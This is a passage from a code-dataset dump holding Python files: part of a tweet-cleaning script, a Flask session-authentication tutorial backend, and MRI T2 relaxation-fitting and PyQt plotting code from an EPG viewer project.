df in enumerate(df_list): hashtags = df.copy()['hashtags'] if any([h in hashtags_to_remove for h in hashtags]): df_list.pop(idx) print(f'Tweet nr {idx} removed!') nr_removed_tweets += 1 print(f'Removed total of {nr_removed_tweets} tweets') # Removes duplicate of tweets unique_ids = {} for idx, df in enumerate(df_list): tweet_id = 
df.copy()['id'] if not tweet_id in unique_ids: unique_ids[str(tweet_id)] = 1 else: print('Found douplicate of tweet id, removing the duplicate!') df_list.pop(idx) # Cleaning the tweet texts for idx, df in enumerate(df_list): tweet = df.copy()['tweet'] # Removing URLs tweet = re.sub(r"http\S+", " ", tweet) tweet = re.sub(r"\S+\.com\S", " ", tweet) # Remove mentions tweet = re.sub(r'\@\w+', ' ', tweet) # Remove non-alphabetic tokens tweet = re.sub('[^A-Za-z]', ' ', tweet.lower()) # Remove double spacings tweet = re.sub(' +', ' ', tweet) # Remove from dataset if tweet empty after cleaning if tweet == 0: df_list.pop(idx) else: df['tweet'] = tweet print('Successfully cleaned data!') # Saving list of tweet dicts to csv format if save_path: print(f'Saving data...') if not save_path.endswith('.csv'): print('Save path is missing .csv format extension!') save_path = save_path + '.csv' try: with open(save_path, 'w', encoding='utf8', newline='') as output_file: csv_file = csv.DictWriter(output_file, fieldnames=df_list[0].keys(), ) csv_file.writeheader() csv_file.writerows(df_list) print(f'Data succesfully saved to "{save_path}"') except Exception as e: print(f'Unable to save data to "{save_path}", check the path and data!') print(f'Exception:\n{e}') dataset_docs = [df['tweet'] for df in df_list] keys = df_list[0].keys() if train: dataset_labels = [df['label'] for df in df_list] return [dataset_docs, dataset_labels], keys else: return dataset_docs, keys
Python
162
35.339508
122
/data_cleaning.py
0.598675
0.596807
Guilherme99/flask-react-session-authenticaton-tutorial
refs/heads/master
from dotenv import load_dotenv import os import redis load_dotenv() class ApplicationConfig: SECRET_KEY = os.environ["SECRET_KEY"] SQLALCHEMY_TRACK_MODIFICATIONS = False SQLALCHEMY_ECHO = True SQLALCHEMY_DATABASE_URI = r"sqlite:///./db.sqlite" SESSION_TYPE = "redis" SESSION_PERMANENT = False SESSION_USE_SIGNER = True SESSION_REDIS = redis.from_url("redis://127.0.0.1:6379")
Python
17
23.235294
60
/server/config.py
0.698297
0.673966
Guilherme99/flask-react-session-authenticaton-tutorial
refs/heads/master
from flask import Flask, request, jsonify, session from flask_bcrypt import Bcrypt from flask_cors import CORS, cross_origin from flask_session import Session from config import ApplicationConfig from models import db, User app = Flask(__name__) app.config.from_object(ApplicationConfig) bcrypt = Bcrypt(app) CORS(app, supports_credentials=True) server_session = Session(app) db.init_app(app) with app.app_context(): db.create_all() @app.route("/@me") def get_current_user(): user_id = session.get("user_id") if not user_id: return jsonify({"error": "Unauthorized"}), 401 user = User.query.filter_by(id=user_id).first() return jsonify({ "id": user.id, "email": user.email }) @app.route("/register", methods=["POST"]) def register_user(): email = request.json["email"] password = request.json["password"] user_exists = User.query.filter_by(email=email).first() is not None if user_exists: return jsonify({"error": "User already exists"}), 409 hashed_password = bcrypt.generate_password_hash(password) new_user = User(email=email, password=hashed_password) db.session.add(new_user) db.session.commit() session["user_id"] = new_user.id return jsonify({ "id": new_user.id, "email": new_user.email }) @app.route("/login", methods=["POST"]) def login_user(): email = request.json["email"] password = request.json["password"] user = User.query.filter_by(email=email).first() if user is None: return jsonify({"error": "Unauthorized"}), 401 if not bcrypt.check_password_hash(user.password, password): return jsonify({"error": "Unauthorized"}), 401 session["user_id"] = user.id return jsonify({ "id": user.id, "email": user.email }) @app.route("/logout", methods=["POST"]) def logout_user(): session.pop("user_id") return "200" if __name__ == "__main__": app.run(debug=True)
Python
80
23.875
71
/server/app.py
0.639015
0.631473
Guilherme99/flask-react-session-authenticaton-tutorial
refs/heads/master
from flask_sqlalchemy import SQLAlchemy from uuid import uuid4 db = SQLAlchemy() def get_uuid(): return uuid4().hex class User(db.Model): __tablename__ = "users" id = db.Column(db.String(32), primary_key=True, unique=True, default=get_uuid) email = db.Column(db.String(345), unique=True) password = db.Column(db.Text, nullable=False)
Python
13
26.461538
82
/server/models.py
0.691877
0.672269
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Sat Mar 3 11:30:41 2018 @author: ERIC """ import numpy as np import lmfit from epg import cpmg_epg_b1 as cpmg_epg_b1_c from scipy import integrate mxyz90 = np.fromfile( 'epg/mxyz90.txt', sep=' ' ) mxyz180 = np.fromfile('epg/mxyz180.txt', sep=' ') mxyz90 = mxyz90.reshape(5,512) mxyz180 = mxyz180.reshape(5,512) offset=130 step=10 epg_slice_xxx =mxyz90[0][offset:-offset+step:step] # mm epg_p90 = mxyz90[-1][offset:-offset+step:step] # degrees epg_p180 = mxyz180[-1][offset:-offset+step:step] # degrees epg_dx=epg_slice_xxx[1]-epg_slice_xxx[0] def fit_cpmg_epg_muscle_philips_hargreaves_c( params, xxx, dx, p90_array, p180_array, yyy_exp=None): parvals = params.valuesdict() T1fat = parvals[ 'T1fat' ] # fixed T1muscle = parvals[ 'T1muscle' ] # fixed echo = parvals[ 'echo' ] # fixed T2fat = parvals[ 'T2fat' ] # fixed/optimized T2muscle = parvals['T2muscle'] # optimized Afat = parvals[ 'Afat'] # optimized Amuscle = parvals['Amuscle'] # optimized B1scale = parvals['B1scale'] Nechos = len(xxx) Ngauss = len(p90_array) signal = np.zeros([Ngauss,Nechos]) fat_signal = np.zeros(Nechos) muscle_signal = np.zeros(Nechos) for i,(p90,p180) in enumerate(zip(p90_array,p180_array)): cpmg_epg_b1_c( fat_signal, p90, p180, T1fat, T2fat, echo, B1scale ) cpmg_epg_b1_c( muscle_signal, p90, p180, T1muscle, T2muscle, echo, B1scale ) signal[i] = Afat*fat_signal+Amuscle*muscle_signal int_signal = integrate.simps(signal, dx=dx,axis=0) if isinstance(yyy_exp, np.ndarray): return( int_signal-yyy_exp) else: return(int_signal) def calculate_T2values_on_slice_muscleEPG(lmparams, yyy_exp): # params = lmfit.Parameters() # params.add('T2fat', value = 180.0, min=0, max=5000, vary=False) # params.add('T2muscle', value = 35, min=0, max=100, vary=True ) # params.add('Afat', value = 0.01, min=0, max=10, vary=True ) # params.add('Amuscle', value = 0.1, min=0, max=10, vary=True ) # params.add('T1fat', value = 365.0, vary=False) # params.add('T1muscle', value = 1400, vary=False) # 
params.add('echo', value = 10.0, vary=False) params = lmparams['epgt2fitparams'] echo_time = params['echo'].value num_echoes = yyy_exp.size parvals = params.valuesdict() print("parvals") for k,v in parvals.items(): print(k,v) print("EPG echo time =", echo_time) xxx = np.linspace( echo_time, echo_time*num_echoes, num_echoes) dx = xxx[1]-xxx[0] yyy_exp_max =yyy_exp.max() if yyy_exp_max == 0: yyy_exp_max = 1.0 yyy_exp_norm = yyy_exp/yyy_exp_max fitModel = lmfit.Minimizer(fit_cpmg_epg_muscle_philips_hargreaves_c, lmparams['epgt2fitparams'], fcn_args=( xxx, dx, epg_p90, epg_p180, yyy_exp_norm)) results = fitModel.minimize() fit_plot = np.zeros(num_echoes) if results.success: fit_plot = results.residual + yyy_exp_norm return( fit_plot, yyy_exp_norm, results, xxx) def calculate_T2values_on_slice_muscleAzz(lmparams, yyy_exp): params = lmparams['azzt2fitparams'] echo_time = params['echo'].value num_echoes = yyy_exp.size model = lmfit.models.ExpressionModel('Afat * (c_l*exp(-x/t2_fl)+c_s*exp(-x/t2_fs)) + Amuscle * (exp(-x/T2muscle))') parvals = params.valuesdict() print("parvals") for k,v in parvals.items(): print(k,v) print("azzabou echo time", echo_time) # saved_output = {'T2muscle_value': [], # 'T2muscle_stderr': [], # 'Amuscle_value': [], # 'Amuscle_stderr': [], # 'Afat_value': [], # 'Afat_stderr': [], # 'chisqr': [], # 'redchi':[], # 'AIC':[], # 'BIC':[], # 'slice':[], # 'pixel_index':[], # } xxx = np.linspace( echo_time, echo_time*num_echoes, num_echoes) yyy_exp_max = yyy_exp.max() fit_plot = np.zeros(num_echoes-2) if yyy_exp_max == 0.0: yyy_exp_max = 1.0 yyy_exp_norm = yyy_exp/yyy_exp_max print("fitting data") results = model.fit(yyy_exp_norm[2:] , x=xxx[2:], params=lmparams['azzt2fitparams']) #mi.plot() #saved_output['name'].append('t2_m') # saved_output['T2muscle_value'].append(results.params['T2muscle'].value) # saved_output['T2muscle_stderr'].append(results.params['T2muscle'].stderr) # saved_output['chisqr'].append(results.chisqr) # 
saved_output['redchi'].append(results.redchi) # saved_output['AIC'].append(results.aic) # saved_output['BIC'].append(results.bic) # # # saved_output['Amuscle_value'].append(results.params['Amuscle'].value) # saved_output['Amuscle_stderr'].append(results.params['Amuscle'].stderr) # saved_output['Afat_value'].append(results.params['Afat'].value) # saved_output['Afat_stderr'].append(results.params['Afat'].stderr) fit_plot = results.residual + yyy_exp_norm[2:] return( fit_plot, yyy_exp_norm, results, xxx)
Python
166
30.728916
155
/t2fit.py
0.573375
0.539311
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Wed Feb 28 13:11:07 2018 @author: neh69 """ import sys import numpy as np #import matplotlib import pandas as pd #import mplcursors from uncertainties import ufloat import t2fit import lmfit as lm from matplotlib import pyplot as plt #import seaborn as sns from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5 import seaborn as sns if is_pyqt5(): print("pyqt5") from matplotlib.backends.backend_qt5agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) else: print("pyqt4") from matplotlib.backends.backend_qt4agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) from matplotlib.figure import Figure from ImageData import T2imageData import epgT2paramsDialog import azzT2paramsDialog #mxyz90 = np.fromfile( 'epg\mxyz90.txt', sep=' ' ) #mxyz180 = np.fromfile('epg\mxyz180.txt', sep=' ') # #mxyz90 = mxyz90.reshape(5,512) #mxyz180 = mxyz180.reshape(5,512) # #offset=130 #step=10 #epg_slice_xxx =mxyz90[0][offset:-offset+step:step] # mm #epg_p90 = mxyz90[-1][offset:-offset+step:step] # degrees #epg_p180 = mxyz180[-1][offset:-offset+step:step] # degrees #epg_dx=epg_slice_xxx[1]-epg_slice_xxx[0] class PlotWidget(QtWidgets.QWidget): def __init__(self, parent=None, showToolbar=True): super(PlotWidget,self).__init__(parent) fig =Figure(figsize=(3, 5)) fig.set_tight_layout(True) self.plot_canvas = FigureCanvas(fig) self.ax = fig.add_subplot(111) self.layout = QtWidgets.QVBoxLayout(self) self.layout.addWidget(self.plot_canvas) if showToolbar: self.toolbar = NavigationToolbar(self.plot_canvas, self) self.layout.addWidget(self.toolbar) def return_ax(self): return(self.ax) class HistogramPlotWidget(PlotWidget): def __init__(self, parent=None, showToolbar=False, mri_plot=None, data_df=None, image_size=256): self.data_df = data_df self.image_size = image_size super(HistogramPlotWidget,self).__init__(parent=parent, showToolbar=showToolbar) self.buttonUpdate = QtWidgets.QPushButton('Update') 
self.buttonUpdate.clicked.connect(self.update) self.layout.addWidget(self.buttonUpdate) def update(self): print((self.ax.get_xlim())) xmin,xmax = self.ax.get_xlim() def update_plot(self, slice_info,data_dframes, plot_param): self.ax.cla() self.plot_canvas.draw() print("Entered HistogramPlotWidget.update_image, plot_param =", plot_param) data_df=None slice_displayed = slice_info[0] T2_slices = slice_info[1] dixon_slices = slice_info[2] print("data_dframes[0]", type(data_dframes[0]), data_dframes[0].columns) print("data_dframes[1]", type(data_dframes[1]), data_dframes[1].columns) if isinstance(data_dframes[0],pd.core.frame.DataFrame): if plot_param in data_dframes[0].columns: print("plot_param {} found in dataframe is T2".format(plot_param)) data_df = data_dframes[0] data_df=data_df[data_df["slice"]==slice_displayed] elif isinstance(data_dframes[1],pd.core.frame.DataFrame): print("plot_param {} found in dataframe is Dixon".format(plot_param)) print("data_dframes[1].columns",data_dframes[1].columns) if plot_param in data_dframes[1].columns: print("plot_param in data_dframes[1]:", plot_param) data_df = data_dframes[1] if slice_displayed in T2_slices: slice_displayed = dixon_slices[T2_slices.index(slice_displayed)] data_df=data_df[data_df["slice"]==slice_displayed] else: print( "HIST", plot_param, " not found") return False else: print("HIST", isinstance(data_dframes[1],pd.core.frame.DataFrame)) return False print("HIST data_df.shape[0]",data_df.shape[0]) if data_df.shape[0] == 0 or type(data_df) == type(None): print("HIST return because df shape[0] = 0 or type of data_df = type None") return False # self.ax2.cla() if isinstance(data_df, pd.core.frame.DataFrame): print("Plotting HIST Plot" ) data_df = data_df.sort_values(by=['roi']) #plot_param = "T2value" for roi in data_df.roi.unique(): print(roi) query_str = '(slice == {}) and (roi == "{}")'.format(slice_displayed, roi) sns.distplot(data_df.query(query_str)[plot_param], hist=False, label=roi, ax=self.ax) # 
self.ax.hist( data_df.query(query_str)[plot_param], bins=100, label=roi, alpha=0.7); self.ax.legend() if plot_param == "T2m": self.ax.set_xlabel("$T_2$ [ms]") elif plot_param == "Am100": self.ax.set_xlabel("$A_m$ [%]") elif plot_param == "Af100": self.ax.set_xlabel("$A_f$ [%]") elif plot_param == "B1": self.ax.set_xlabel("$B_1$") elif plot_param == "fatPC": self.ax.set_xlabel("ff [%]") self.ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) self.plot_canvas.draw() return True class BarPlotWidget(PlotWidget): def __init__(self, parent=None, showToolbar=True, data_df=None, image_size=256): self.data_df = data_df self.image_size = image_size super(BarPlotWidget,self).__init__(parent=parent, showToolbar=showToolbar) # self.buttonUpdate = QtWidgets.QPushButton('Update') # self.buttonUpdate.clicked.connect(self.update) # self.layout.addWidget(self.buttonUpdate) def update(self): print((self.ax.get_xlim())) xmin,xmax = self.ax.get_xlim() def update_plot(self, slice_info,data_dframes, plot_param): self.ax.cla() self.plot_canvas.draw() print("Entered BarPlotWidget.update_image, plot_param =", plot_param) #print(data_.columns) slice_displayed = slice_info[0] T2_slices = slice_info[1] dixon_slices = slice_info[2] data_df=None print("data_dframes[0]", type(data_dframes[0]), data_dframes[0].columns) print("data_dframes[1]", type(data_dframes[1]), data_dframes[1].columns) if isinstance(data_dframes[0],pd.core.frame.DataFrame): if plot_param in data_dframes[0].columns: print("plot_param {} found in dataframe is T2".format(plot_param)) data_df = data_dframes[0] data_df=data_df[data_df["slice"]==slice_displayed] elif isinstance(data_dframes[1],pd.core.frame.DataFrame): print("plot_param {} found in dataframe is Dixon".format(plot_param)) print("data_dframes[1].columns",data_dframes[1].columns) if plot_param in data_dframes[1].columns: print("plot_param in data_dframes[1]:", plot_param) data_df = data_dframes[1] if slice_displayed in T2_slices: slice_displayed = 
dixon_slices[T2_slices.index(slice_displayed)] # else: # dixon_slice = slice_displayed # slice_displayed = dixon_slices[T2_slices.index(slice_displayed)] data_df=data_df[data_df["slice"]==slice_displayed] else: print( plot_param, " not found") return(False) else: print(isinstance(data_dframes[1],pd.core.frame.DataFrame)) return(False) print("HIST data_df.shape[0]", data_df.shape[0]) if data_df.shape[0] == 0 or type(data_df) == type(None): print("return because df shape[0] = 0 or type of data_df = type None") return False data_df = data_df.sort_values(by=['roi']) if isinstance(data_df, pd.core.frame.DataFrame): print("Plotting BAR Plot" ) #plot_param = "T2value" # for roi in data_df.roi.unique(): # print(roi) # query_str = '(slice == {}) and (roi == "{}")'.format(slice_displayed, roi) # self.ax.hist( data_df.query(query_str)[plot_param], bins=100, label=roi, alpha=0.4); # self.ax.legend() # numRois = data_df.roi.unique().shape[0] sns.catplot( kind='bar', x='slice', y=plot_param, data=data_df, hue='roi', ci="sd", ax=self.return_ax() ); self.ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) 
if plot_param == "T2m": self.ax.set_ylabel("$T_2$ [ms]") elif plot_param == "Am100": self.ax.set_ylabel("$A_m$ [%]") elif plot_param == "Af100": self.ax.set_ylabel("$A_f$ [%]") elif plot_param == "B1": self.ax.set_ylabel("$B_1$") elif plot_param == "fatPC": self.ax.set_ylabel("ff [%]") self.ax.set_xlabel("slices") # plt.tight_layout() self.plot_canvas.draw() return True class T2PlotWidget(PlotWidget): def __init__( self, lmparams, parent=None, showToolbar=True): super(T2PlotWidget, self).__init__(parent, showToolbar=showToolbar) self.plot_T2_startup() self.lmparams = lmparams self.T2epgnorm_btns = radiobuttons_EPGWidget(self.lmparams, self) self.layout.addWidget(self.T2epgnorm_btns) def plot_T2_startup(self): ttt = np.linspace(0,170, 17) yyy = 80*np.exp(-ttt/35.0)+20*np.exp(-ttt/120.0) yyy1 = yyy+np.random.randn(len(yyy)) self.ax.semilogy(ttt, yyy1, 'o') self.ax.semilogy(ttt, yyy, '-') self.ax.set_xlabel('Time [ms]') self.ax.set_ylabel('Signal') self.ax.set_ylim(1,110) def update_plot(self, xcoord, ycoord, t2data): print("update_T2PlotImag called") #self.ttt = np.linspace(0,170, 17) self.ax.cla() # clear the plot area if self.T2epgnorm_btns.epg_rbtn.isChecked(): print("Run EPG Fit") print('echo value', self.lmparams['epgt2fitparams']['echo']) # params = lm.Parameters() # params.add('T2fat', value = 180.0, min=0, max=5000, vary=False) # params.add('T2muscle', value = 35, min=0, max=100, vary=True ) # params.add('Afat', value = 0.01, min=0, max=10, vary=True ) # params.add('Amuscle', value = 0.1, min=0, max=10, vary=True ) # params.add('T1fat', value = 365.0, vary=False) # params.add('T1muscle', value = 1400, vary=False) # params.add('echo', value = 10.0, vary=False) #xxx = np.linspace(10,10*len(t2data), len(t2data)) # self.params.pretty_print() #fit_values, fit_curve, fit_data, lmresults = t2fit.calculate_T2values_on_slice_muscleEPG(self.lmparams, t2data, len(t2data), xxx, epg_dx, epg_p90, epg_p180) fit_curve, fit_data, lmresults, xxx = 
t2fit.calculate_T2values_on_slice_muscleEPG(self.lmparams, t2data) else: print("Run Normal T2 Fit") fit_curve, fit_data, lmresults, xxx = t2fit.calculate_T2values_on_slice_muscleAzz(self.lmparams,t2data) print(dir(lmresults)) print(lmresults.success) if not lmresults.success: return # # Create uncertainty floats of varied params # ufs = {} for vname in lmresults.var_names: v = lmresults.params[vname].value e = lmresults.params[vname].stderr ufs[vname] = ufloat( v,e) if ('Amuscle' in ufs.keys()) and ('Afat' in ufs.keys()): ufs['Amuscle'] = 100.0*ufs['Amuscle']/(ufs['Amuscle']+ufs['Afat']) ufs['Afat'] = 100.0-ufs['Amuscle'] t2m_str = "" t2f_str = "" Am_str = "" Af_str = "" B1_str = "" for name, value in ufs.items(): print(name) if name == 'T2muscle': t2m_str = "$T_{{2m}}$ = ${:5.2fL}$ ms\n".format(value) elif name == 'T2fat': t2f_str = "$T_{{2f}}$ = ${:5.2fL}$ ms\n".format(value) elif name == 'Amuscle': Am_str = "$A_m$ = ${:5.2fL}$\n".format(value) elif name == 'Afat': Af_str = "$A_f$ = ${:5.2fL}$\n".format(value) elif name == 'B1scale': B1_str = "$B_1$ scale = ${:5.2fL}$\n".format(value) results_legend = "{}{}{}{}{}".format(t2m_str, t2f_str, Am_str, Af_str, B1_str) if self.T2epgnorm_btns.epg_rbtn.isChecked(): self.ax.semilogy(xxx, 100*fit_data, 'o') self.ax.semilogy(xxx, 100*fit_curve, '-', label=results_legend) else: self.ax.semilogy(xxx[2:], 100*fit_curve, '-', label=results_legend) self.ax.semilogy(xxx, 100*fit_data, 'o') self.ax.legend( fontsize=8) #self.ax.set_ylim(1,110) self.ax.set_xlabel('Time [ms]') self.ax.set_ylabel('Signal') self.ax.set_ylim(0.5,150) self.plot_canvas.draw() class radiobuttons_EPGWidget(QtWidgets.QWidget): def __init__(self, lmparams, parent=None): self.lmparams = lmparams self.epgDialog = QtWidgets.QDialog() self.epgT2params_widget = epgT2paramsDialog.EpgT2paramsDialog(self.lmparams) self.epgT2params_widget.setupEpgT2paramsDialog(self.epgDialog) self.azzDialog = QtWidgets.QDialog() self.azzT2params_widget = 
azzT2paramsDialog.AzzT2paramsDialog(self.lmparams) self.azzT2params_widget.setupAzzT2paramsDialog(self.azzDialog) super(radiobuttons_EPGWidget, self).__init__(parent) hlayout = QtWidgets.QHBoxLayout(self) group_rbtns = QtWidgets.QButtonGroup() group_rbtns.exclusive() self.epg_rbtn = QtWidgets.QRadioButton("EPG T2") self.norm_rbtn = QtWidgets.QRadioButton("normal T2") self.norm_rbtn.setChecked(True); self.T2params_btn = QtWidgets.QPushButton("T2 Parameters") self.epg_rbtn.fittingParam = "epg" self.norm_rbtn.fittingParam= 'norm' self.epg_rbtn.toggled.connect(lambda:self.btnstate(self.epg_rbtn)) self.norm_rbtn.toggled.connect(lambda:self.btnstate(self.norm_rbtn)) self.T2params_btn.clicked.connect(self.T2params_btn_clicked) group_rbtns.addButton(self.epg_rbtn) group_rbtns.addButton(self.norm_rbtn) hlayout.addWidget(self.norm_rbtn) hlayout.addWidget(self.epg_rbtn) hlayout.addStretch(1) hlayout.addWidget(self.T2params_btn) def T2params_btn_clicked(self): print("T2params_btn_clicked") if self.epg_rbtn.isChecked(): rt = self.epgDialog.show() else: rt = self.azzDialog.show() print("rt =", rt) def btnstate(self,b): if b.isChecked(): print(b.text()) print(b.fittingParam) #self.mri_window.on_fittingParams_rbtn_toggled( str(b.fittingParam)) class radiobuttons_fitWidget(QtWidgets.QWidget): def __init__(self, parent=None, mri_window=None): super(radiobuttons_fitWidget, self).__init__(parent) self.mri_window = mri_window vbox1_radiobuttons = QtWidgets.QVBoxLayout(self) group_fittingParams_rbtns = QtWidgets.QButtonGroup() group_fittingParams_rbtns.exclusive() self.T2_rbtn = QtWidgets.QRadioButton("T2") self.Am_rbtn = QtWidgets.QRadioButton("Am") self.Af_rbtn = QtWidgets.QRadioButton("Af") self.B1_rbtn = QtWidgets.QRadioButton("B1") self.Dixon_rbtn = QtWidgets.QRadioButton("Dixon Fat [%]") self.T2_rbtn.setChecked(True) self.T2_rbtn.fittingParam = "T2m" self.Am_rbtn.fittingParam = "Am100" self.Af_rbtn.fittingParam = "Af100" self.B1_rbtn.fittingParam = "B1" 
self.Dixon_rbtn.fittingParam = "fatPC" self.T2_rbtn.toggled.connect(lambda:self.btnstate(self.T2_rbtn)) self.Am_rbtn.toggled.connect(lambda:self.btnstate(self.Am_rbtn)) self.Af_rbtn.toggled.connect(lambda:self.btnstate(self.Af_rbtn)) self.B1_rbtn.toggled.connect(lambda:self.btnstate(self.B1_rbtn)) self.Dixon_rbtn.toggled.connect(lambda:self.btnstate(self.Dixon_rbtn)) group_fittingParams_rbtns.addButton(self.T2_rbtn) group_fittingParams_rbtns.addButton(self.Am_rbtn) group_fittingParams_rbtns.addButton(self.Af_rbtn) group_fittingParams_rbtns.addButton(self.B1_rbtn) group_fittingParams_rbtns.addButton(self.Dixon_rbtn) vbox1_radiobuttons.addWidget(self.T2_rbtn) vbox1_radiobuttons.addWidget(self.Am_rbtn) vbox1_radiobuttons.addWidget(self.Af_rbtn) vbox1_radiobuttons.addWidget(self.B1_rbtn) vbox1_radiobuttons.addWidget(self.Dixon_rbtn) vbox1_radiobuttons.addStretch(1) def btnstate(self,b): if b.isChecked(): print(b.text()) print(b.fittingParam) self.mri_window.on_fittingParams_rbtn_toggled( str(b.fittingParam)) class ApplicationWindow(QtWidgets.QMainWindow): def __init__(self, params): self.params = params imageData = T2imageData() print("imageData.fittingParam:",imageData.fittingParam) npts = 256*100 iii = np.random.permutation(np.arange(255*255))[:npts] ddd = np.random.randn(npts)*100+500 data_df = pd.DataFrame({'iii': iii, 'ddd':ddd}) super(ApplicationWindow, self).__init__() leftwindow = QtWidgets.QWidget() rightwindow = QtWidgets.QWidget() splitHwidget = QtWidgets.QSplitter(QtCore.Qt.Horizontal) #hlayout = QtWidgets.QHBoxLayout(self._main) hlayout = QtWidgets.QHBoxLayout(leftwindow) vlayout = QtWidgets.QVBoxLayout(rightwindow) mriplot_window = MRIPlotWidget(imageData=imageData) rbtns_window = radiobuttons_fitWidget(mri_window=mriplot_window) t2plot_window = T2PlotWidget( self.params, showToolbar=False) h1_window = PlotWidget( showToolbar=False) h2_window = HistogramPlotWidget(showToolbar=True) #hlayout.addWidget(mriplot_window) 
mriplot_window.register_PlotWidgets(t2plot_window, h1_window, h2_window) #vbox1_radiobuttons = QtWidgets.QVBoxLayout() # hbox.addLayout(vbox1_radiobuttons) # hbox.addLayout(vbox1_image) # hbox.addLayout(vbox2_image) hlayout.addWidget(rbtns_window) hlayout.addWidget(mriplot_window) vlayout.addWidget(t2plot_window) vlayout.addWidget(h1_window) vlayout.addWidget(h2_window) def func3(x, y): return (1 - x / 2 + x**5 + y**3) * np.exp(-(x**2 + y**2)) # make these smaller to increase the resolution dx, dy = 0.05, 0.05 x = np.arange(-3.0, 3.0, dx) y = np.arange(-3.0, 3.0, dy) X, Y = np.meshgrid(x, y) # when layering multiple images, the images need to have the same # extent. This does not mean they need to have the same shape, but # they both need to render to the same coordinate system determined by # xmin, xmax, ymin, ymax. Note if you use different interpolations # for the images their apparent extent could be different due to # interpolation edge effects extent = np.min(x), np.max(x), np.min(y), np.max(y) Z1 = np.add.outer(range(8), range(8)) % 2 # chessboard mriplot_window.return_ax().imshow(Z1, cmap=plt.cm.gray, interpolation='nearest', extent=extent) Z2 = func3(X, Y) mriplot_window.return_ax().imshow(Z2, cmap=plt.cm.viridis, alpha=.9, interpolation='bilinear', extent=extent) splitHwidget.addWidget(leftwindow) splitHwidget.addWidget(rightwindow ) print(data_df.head()) plot_image = np.zeros(255*255) plot_image[data_df['iii']] = data_df['ddd'] h1_window.return_ax().imshow( plot_image.reshape((255,255))) h1_window.return_ax().set_xlabel('x') h1_window.return_ax().set_ylabel('y') h2_window.return_ax().hist(ddd, bins=100) h2_window.return_ax().set_xlabel('x') h2_window.return_ax().set_ylabel('y') self.setCentralWidget(splitHwidget) def zoom(self): self.histtoolbar.zoom() def ax_changed(self,ax): old_xlim, old_ylim = self.lim_dict[ax] print("old xlim", old_xlim, "ylim", old_ylim) print("new xlim", ax.get_xlim(), "ylim", ax.get_ylim()) return np.all(old_xlim == 
ax.get_xlim()) and np.all(old_ylim == ax.get_ylim()) def onrelease(self,event): print("Active Toolbar button:",self.histtoolbar._active ) print("plot release") print(event) self.static_canvas.flush_events() changed_axes = [ax for ax in self.static_canvas.figure.axes if self.ax_changed(ax)] not_changed_axes = [ax for ax in self.static_canvas.figure.axes if not self.ax_changed(ax)] print("changed_axes",changed_axes) print("not_changed_axes",not_changed_axes) for ax in changed_axes: print("Changed xlim", ax.get_xlim(), "ylim", ax.get_ylim()) if __name__ == "__main__": epgt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.2, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.8, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) qapp = QtWidgets.QApplication(sys.argv) app = ApplicationWindow(epgt2fitparams) app.show() qapp.exec_()
Python
703
31.364153
171
/visionplot_widgets.py
0.566313
0.543463
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'epg_fit_parameters_dialog.ui' # # Created by: PyQt5 UI code generator 5.6 # # WARNING! All changes made in this file will be lost! import lmfit as lm from PyQt5 import QtCore, QtGui, QtWidgets class EpgT2paramsDialog(object): def __init__(self, lmparams): self.lmparams = lmparams self.params = self.lmparams['epgt2fitparams'] def setupEpgT2paramsDialog(self, Dialog): self.Dialog = Dialog Dialog.setObjectName("Dialog") Dialog.resize(386, 284) self.buttonBox = QtWidgets.QDialogButtonBox(Dialog) self.buttonBox.setGeometry(QtCore.QRect(60, 250, 321, 23)) self.buttonBox.setOrientation(QtCore.Qt.Horizontal) self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok) self.buttonBox.setObjectName("buttonBox") self.widget = QtWidgets.QWidget(Dialog) self.widget.setGeometry(QtCore.QRect(20, 10, 361, 231)) self.widget.setObjectName("widget") self.gridLayout = QtWidgets.QGridLayout(self.widget) self.gridLayout.setContentsMargins(0, 0, 0, 0) self.gridLayout.setObjectName("gridLayout") self.fatT1value = QtWidgets.QLineEdit(self.widget) self.fatT1value.setValidator(QtGui.QDoubleValidator()) self.fatT1value.setObjectName("fatT1value") self.gridLayout.addWidget(self.fatT1value, 7, 1, 1, 1) self.muscleFractionMax = QtWidgets.QLineEdit(self.widget) self.muscleFractionMax.setValidator(QtGui.QDoubleValidator()) self.muscleFractionMax.setObjectName("muscleFractionMax") self.gridLayout.addWidget(self.muscleFractionMax, 3, 3, 1, 1) self.optimizeMuscleFraction = QtWidgets.QCheckBox(self.widget) self.optimizeMuscleFraction.setText("") self.optimizeMuscleFraction.setChecked(True) self.optimizeMuscleFraction.setObjectName("optimizeMuscleFraction") self.gridLayout.addWidget(self.optimizeMuscleFraction, 3, 4, 1, 1) self.fatFractionMin = QtWidgets.QLineEdit(self.widget) self.fatFractionMin.setValidator(QtGui.QDoubleValidator()) self.fatFractionMin.setObjectName("fatFractionMin") 
